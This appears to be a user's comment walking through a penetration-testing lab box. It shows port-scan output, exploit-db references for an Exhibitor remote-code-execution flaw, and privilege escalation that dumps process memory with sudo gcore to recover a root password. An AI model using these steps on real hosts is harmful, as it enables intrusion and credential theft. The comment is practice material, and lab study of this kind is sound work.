WDavid404
commented
4 months ago PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp syn-ack ttl 61 CUPS 2.2
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
|_http-title: Forbidden - CUPS v2.2.10
2181/tcp open zookeeper syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8080/tcp open http syn-ack ttl 61 Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
8081/tcp open http syn-ack ttl 61 nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://192.168.203.98:8080/exhibitor/v1/ui/index.html
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
34631/tcp open java-rmi syn-ack ttl 61 Java RMI
search exploit info for Samba smbd, ipp CUPS 2.2.10, zookeeper 3.4, Jetty 1.0, nginx 1.14.2, java-rmi --> Samba 3.5.0 - Remote Code Execution (https://www.exploit-db.com/exploits/42060) Jetty Web Server - Directory Traversal (https://www.exploit-db.com/exploits/36318)
SMB
http://192.168.203.98:8080/exhibitor/v1/ui/index.html
--》
find Exhibitor Web UI 1.7.1 - Remote Code Execution (https://www.exploit-db.com/exploits/48654 )
--》
We got a reverse shell from the target host
sudo -l
According to https://gtfobins.github.io/gtfobins/gcore/ we need to find a useful PID in the target host so we can abuse gcore
pspy64:
run sudo /usr/bin/gcore $PID
cat core.496
-->
so, root's password is "UClogKingpinInning731UР"?
Oh...we even can run strings command on the target host....
strings core.496
-->
password should be "ClogKingpinInning731"
then,
su root
Keypoints: